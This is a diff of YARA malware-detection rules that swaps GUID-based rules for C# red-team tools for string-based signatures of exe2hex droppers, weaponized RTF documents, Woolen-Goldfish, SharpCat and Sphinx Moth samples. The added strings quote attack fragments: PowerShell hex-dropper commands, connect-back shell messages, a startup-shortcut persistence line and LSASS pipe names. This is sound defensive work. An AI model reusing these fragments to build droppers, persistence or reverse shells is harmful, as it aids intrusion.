-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d25c9033-13e8-5fc9-8561-f8862cca39b8"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/mashed-potatoes/USBTrojan"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1891-L1904"
+		description = "Detects binaries created with BDARGO Advanced BAT to EXE converter"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c9da4184-1530-5525-bdba-2dcc8a221bb1"
+		date = "2018-07-28"
+		modified = "2022-06-23"
+		reference = "https://www.majorgeeks.com/files/details/advanced_bat_to_exe_converter.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_bat2exe.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2280803c42311b8b78a51f0917d9fb4cdd8ca427ce2361372914e5922a1a0b68"
-		score = 75
+		logic_hash = "978aa25f1abd0cbd36e55da2b1ed4478a3a5b8b814988669c70e219cc2dd1afd"
+		score = 45
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda"
+		hash1 = "a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88"
 
 	strings:
-		$typelibguid0lo = "4eee900e-adc5-46a7-8d7d-873fd6aea83e" ascii wide
+		$s1 = "Error #bdembed1 -- Quiting" fullword ascii
+		$s2 = "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$s3 = "\\a.txt" ascii
+		$s4 = "command.com" fullword ascii
+		$s6 = "DFDHERGDCV" fullword ascii
+		$s7 = "DFDHERGGZV" fullword ascii
+		$s8 = "%s%s%s%s%s%s%s%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_IIS_Backdoor : FILE
+rule SIGNATURE_BASE_Payload_Exe2Hex
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "44264dd9-f8e9-5a60-847f-94378e07a327"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/WBGlIl/IIS_backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1906-L1920"
+		description = "Detects payload generated by exe2hex"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c29e4937-cc6a-5265-a3b9-1018228dc956"
+		date = "2016-01-15"
+		modified = "2023-12-05"
+		reference = "https://github.com/g0tmi1k/exe2hex"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_exe2hex_payload.yar#L8-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "61fcba7e59ac005db140d8eee1d8a1fd4ce8cd18c069053270e0195ee9d63ccc"
-		score = 75
+		logic_hash = "91b738f0174a267bbc900d59abcb504d2ae0bac8c287c3b7d1ebfc57374a7ee7"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3fda4aa9-6fc1-473f-9048-7edc058c4f65" ascii wide
-		$typelibguid1lo = "73ca4159-5d13-4a27-8965-d50c41ab203c" ascii wide
+		$a1 = "set /p \"=4d5a" ascii
+		$a2 = "powershell -Command \"$hex=" ascii
+		$b1 = "set+%2Fp+%22%3D4d5" ascii
+		$b2 = "powershell+-Command+%22%24hex" ascii
+		$c1 = "echo 4d 5a " ascii
+		$c2 = "echo r cx >>" ascii
+		$d1 = "echo+4d+5a+" ascii
+		$d2 = "echo+r+cx+%3E%3E" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Shellgen : FILE
+rule SIGNATURE_BASE_Malrtf_Ole2Link : EXPLOIT FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "538a4f12-5020-5c76-9208-363f435ed9a9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/jasondrawdy/ShellGen"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1922-L1935"
+		description = "Detects weaponized RTF documents with OLE2Link exploit"
+		author = "@h3x2b <tracker _AT h3x.eu>"
+		id = "5080e79a-3abc-5fc3-902e-b362f20510f9"
+		date = "2017-04-12"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_rtf_ole2link.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "80c7291653e6cb5d7ef4d69390f7508cd95149d92b59aa3b5c8e6e0fe3723bfe"
+		logic_hash = "d7ef764a0006b81c2b50699aa1fccb35c7c7da982cb8d56e02097114468e298f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "EXPLOIT, FILE"
 
 	strings:
-		$typelibguid0lo = "c6894882-d29d-4ae1-aeb7-7d0a9b915013" ascii wide
+		$rtf_olelink_01 = "\\objdata" nocase
+		$rtf_olelink_02 = "4f4c45324c696e6b" nocase
+		$rtf_olelink_03 = "d0cf11e0a1b11ae1" nocase
+		$rtf_payload_01 = "68007400740070003a002f002f00" nocase
+		$rtf_payload_02 = "680074007400700073003a002f002f00" nocase
+		$rtf_payload_03 = "6600740070003a002f002f00" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32be( 0 ) == 0x7B5C7274 and all of ( $rtf_olelink_* ) and any of ( $rtf_payload_* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Mass_RAT : FILE
+rule SIGNATURE_BASE_Woolengoldfish_Sample_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "90b742da-6fd7-5c72-96cf-7a37a3e5d808"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Mass-RAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1937-L1952"
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "923de51a-8422-5318-95f5-79613d2d642e"
+		date = "2015-03-25"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/NpJpVZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_woolengoldfish.yar#L13-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "53ef9b1d44e6497bafe0982f2e6be65240fcf5684a7b5a6c32a704ab3b7e085c"
-		score = 75
+		hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
+		logic_hash = "9490715a2fc7d3c742771a8211bcfb4c0a0bafba4d5de8eee5825fdabaded6af"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "6c43a753-9565-48b2-a372-4210bb1e0d75" ascii wide
-		$typelibguid1lo = "92ba2a7e-c198-4d43-929e-1cfe54b64d95" ascii wide
-		$typelibguid2lo = "4cb9bbee-fb92-44fa-a427-b7245befc2f3" ascii wide
+		$s1 = "Cannot execute (%d)" fullword ascii
+		$s16 = "SvcName" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Browser_Externalc2 : FILE
+rule SIGNATURE_BASE_Woolengoldfish_Generic_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8c309522-90e7-5f5a-b456-3a472756d397"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/mdsecactivebreach/Browser-ExternalC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1954-L1967"
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "351f5ee5-c0ec-51b6-9953-2b64e3e74b09"
+		date = "2015-03-25"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/NpJpVZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_woolengoldfish.yar#L30-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a0027775fb2a06d01cfe30c85ce03e11cf43976abe9bf7b2c61895a55d26404"
-		score = 75
+		logic_hash = "79879be4f49c8830573eb4a9f958ef9060413ea8b5dd3f8f3d5816e146d3a0b7"
+		score = 90
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
+		hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
+		hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
 
 	strings:
-		$typelibguid0lo = "10a730cd-9517-42d5-b3e3-a2383515cca9" ascii wide
+		$x0 = "Users\\Wool3n.H4t\\"
+		$x1 = "C-CPP\\CWoolger"
+		$x2 = "NTSuser.exe" fullword wide
+		$s1 = "107.6.181.116" fullword wide
+		$s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
+		$s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
+		$s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
+		$s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
+		$s6 = "wlg.dat" fullword
+		$s7 = "woolger" fullword wide
+		$s8 = "[Enter]" fullword
+		$s9 = "[Control]" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		(1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Offensivepowershelltasking : FILE
+rule SIGNATURE_BASE_Woolengoldfish_Generic_2
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d221e24d-a2ef-51e2-95bf-4b91b438d9cf"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/leechristensen/OffensivePowerShellTasking"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1969-L1983"
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "930b928f-ff32-56b2-9e3c-dd80036ff7ef"
+		date = "2015-03-25"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/NpJpVZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_woolengoldfish.yar#L62-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "21d7192eaefeeed030b1ef1be29b54c12826914dc6f0945789f3690a39bee217"
-		score = 75
+		logic_hash = "25d2ea25543b0a6330e443333f1ac7a59874631c8ee7faeb4ea6d94c62c255fc"
+		score = 90
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
+		hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
+		hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
+		hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
 
 	strings:
-		$typelibguid0lo = "d432c332-3b48-4d06-bedb-462e264e6688" ascii wide
-		$typelibguid1lo = "5796276f-1c7a-4d7b-a089-550a8c19d0e8" ascii wide
+		$s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dohc2 : FILE
+rule SIGNATURE_BASE_Woolengoldfish_Generic_3
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0bb38f10-ca5c-5c18-97c9-540b6367d150"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/SpiderLabs/DoHC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1985-L1998"
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5c227d24-624c-5fb5-a2ea-a971fda8bfba"
+		date = "2015-03-25"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/NpJpVZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_woolengoldfish.yar#L81-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1601c438c4359d3daa1b5b3cc36a82e049a5ed379ec7a52cdd4a9bca83518dd3"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		logic_hash = "ac51c25ad6ef6668238fef1de50517d48e6509f57cd6dd723595777ae16d8a6c"
+		score = 90
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
+		hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
 
 	strings:
-		$typelibguid0lo = "9877a948-2142-4094-98de-e0fbb1bc4062" ascii wide
+		$x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" fullword ascii
+		$x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
+		$x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
+		$s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
+		$s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
+		$s2 = "Attempting to unlock uninitialized lock!" fullword ascii
+		$s4 = "unable to load kernel32.dll" fullword ascii
+		$s5 = "index.php?c=%S&r=%x" fullword wide
+		$s6 = "%s len:%d " fullword ascii
+		$s7 = "Encountered error sending syscall response to client" fullword ascii
+		$s9 = "/info.dat" fullword ascii
+		$s10 = "Error entering thread lock" fullword ascii
+		$s11 = "Error exiting thread lock" fullword ascii
+		$s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		(1 of ( $x* ) ) or ( 8 of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Syscallpoc : FILE
+rule SIGNATURE_BASE_Sharpcat : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1ed5e226-0dcd-5397-b5e8-41f8a14981a1"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/SolomonSklash/SyscallPOC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2000-L2014"
+		description = "Detects command shell SharpCat - file SharpCat.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "94a7ce40-ac2f-598e-86c5-ee9fde1eeef0"
+		date = "2016-06-10"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cn33liz/SharpCat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sharpcat.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a12628052d5c1043b3aae0bedb62908a35cb27871e329f84b0fc22e29149f89e"
+		logic_hash = "4a38812b07b40bdde03049dbff1f9de38cadaf9941ab8b40b84016b1d5cbfd51"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "96dcdf68b06c3609f486f9d560661f4fec9fe329e78bd300ad3e2a9f07e332e9"
 
 	strings:
-		$typelibguid0lo = "1e54637b-c887-42a9-af6a-b4bd4e28cda9" ascii wide
-		$typelibguid1lo = "198d5599-d9fc-4a74-87f4-5077318232ad" ascii wide
+		$x1 = "ShellZz" fullword ascii
+		$s2 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$s3 = "currentDirectory" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Pen_Test_Tools : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Cudacrt : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "00fb98a9-e615-5fb6-a555-4326b93e2c24"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/awillard1/Pen-Test-Tools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2016-L2040"
+		description = "sphinx moth threat group file cudacrt.dll"
+		author = "Kudelski Security - Nagravision SA"
+		id = "233f657b-029a-5ed4-b2f7-712851297f18"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L9-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dc124d65fd724a2e73c708925f44fd87dcd067c121f2875a15ed790c84405899"
-		score = 50
+		logic_hash = "ae7ff3d5ffd29de80ce5dcccde9af04d2537a279fe35f6e94257d59a462ba6a0"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "922e7fdc-33bf-48de-bc26-a81f85462115" ascii wide
-		$typelibguid1lo = "ad5205dd-174d-4332-96d9-98b076d6fd82" ascii wide
-		$typelibguid2lo = "b67e7550-f00e-48b3-ab9b-4332b1254a86" ascii wide
-		$typelibguid3lo = "5e95120e-b002-4495-90a1-cd3aab2a24dd" ascii wide
-		$typelibguid4lo = "295017f2-dc31-4a87-863d-0b9956c2b55a" ascii wide
-		$typelibguid5lo = "abbaa2f7-1452-43a6-b98e-10b2c8c2ba46" ascii wide
-		$typelibguid6lo = "a4043d4c-167b-4326-8be4-018089650382" ascii wide
-		$typelibguid7lo = "51abfd75-b179-496e-86db-62ee2a8de90d" ascii wide
-		$typelibguid8lo = "a06da7f8-f87e-4065-81d8-abc33cb547f8" ascii wide
-		$typelibguid9lo = "ee510712-0413-49a1-b08b-1f0b0b33d6ef" ascii wide
-		$typelibguid10lo = "9780da65-7e25-412e-9aa1-f77d828819d6" ascii wide
-		$typelibguid11lo = "7913fe95-3ad5-41f5-bf7f-e28f080724fe" ascii wide
+		$s0 = "HPSSOEx.dll" fullword wide
+		$s1 = "255.255.255.254" fullword wide
+		$s2 = "SOFTWARE\\SsoAuth\\Service" fullword wide
+		$op0 = { ff 15 5f de 00 00 48 8b f8 48 85 c0 75 0d 48 8b }
+		$op1 = { 45 33 c9 4c 8d 05 a7 07 00 00 33 d2 33 c9 ff 15 }
+		$op2 = { e8 7a 1c 00 00 83 f8 01 74 17 b9 03 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 243KB and all of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_The_Collection : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_H2T : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4ae78576-ab75-5679-9a29-4d9a1ff03f15"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/Tlgyt/The-Collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2042-L2059"
+		description = "sphinx moth threat group file h2t.dat"
+		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
+		id = "62d14efd-7d0b-5f66-9e78-74f3f9e2fd5b"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8e28d972aaf44caff35bf982788a6e9b69d0acce4b11c8cfa00c65466412305"
+		logic_hash = "7aca260d415de84cf432b18385db6a9768a036e3bd0a9aa8ded4a1bfcad26d0c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "579159ff-3a3d-46a7-b069-91204feb21cd" ascii wide
-		$typelibguid1lo = "5b7dd9be-c8c3-4c4f-a353-fefb89baa7b3" ascii wide
-		$typelibguid2lo = "43edcb1f-3098-4a23-a7f2-895d927bc661" ascii wide
-		$typelibguid3lo = "5f19919d-cd51-4e77-973f-875678360a6f" ascii wide
-		$typelibguid4lo = "17fbc926-e17e-4034-ba1b-fb2eb57f5dd3" ascii wide
+		$x1 = "%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd]" fullword ascii
+		$s1 = "[-] Error in connection() %d - %s" fullword ascii
+		$s2 = "[-] Child process exit." fullword ascii
+		$s3 = "POST http://%s:%s/ HTTP/1.1" fullword ascii
+		$s4 = "pipe() to" fullword ascii
+		$s5 = "pipe() from" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 156KB and ( $x1 or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Change_Lockscreen : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Iastor32 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a817c6e8-95f9-56c6-97b8-4be06658629f"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/nccgroup/Change-Lockscreen"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2061-L2074"
+		description = "sphinx moth threat group file iastor32.exe"
+		author = "Kudelski Security - Nagravision SA"
+		id = "5688c598-ea18-578f-bb8a-3729c0502af5"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L47-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b3cd265c6ccdae529a52c3609610f0e633f0112180afd63a5d9892e78d12ef1"
+		logic_hash = "056949677654a88fb430c988939006dacfefdabbe12824936a01e5aabbb73441"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "78642ab3-eaa6-4e9c-a934-e7b0638bc1cc" ascii wide
+		$s0 = "MIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nN" fullword ascii
+		$s1 = "iAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_LOLBITS : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Kerberos32 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "66454ac0-742b-51a3-ac45-1ac9606e8b89"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/Kudaes/LOLBITS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2076-L2089"
+		description = "sphinx moth threat group file kerberos32.dll"
+		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
+		id = "769ee362-2363-511a-8f17-99e66c9bab53"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L61-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa5978a49940cef63308ae228607eff22d19ea05373b2c4a3a293074af422b20"
+		logic_hash = "5b672c9b9b0ffffd8f243832ea217bfc10b08026c71d297ee1047ca999fb829c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "29d09aa4-ea0c-47c2-973c-1d768087d527" ascii wide
+		$x1 = "%WINDIR%\\ativpsrz.bin" fullword ascii
+		$x2 = "%WINDIR%\\ativpsrn.bin" fullword ascii
+		$x3 = "kerberos32.dll" fullword wide
+		$x4 = "KERBEROS64.dll" fullword ascii
+		$x5 = "kerberos%d.dll" fullword ascii
+		$s1 = "\\\\.\\pipe\\lsassp" fullword ascii
+		$s2 = "LSASS secure pipe" fullword ascii
+		$s3 = "NullSessionPipes" fullword ascii
+		$s4 = "getlog" fullword ascii
+		$s5 = "startlog" fullword ascii
+		$s6 = "stoplog" fullword ascii
+		$s7 = "Unsupported OS (%d)" fullword ascii
+		$s8 = "Unsupported OS (%s)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Keylogger : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Kerberos64 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
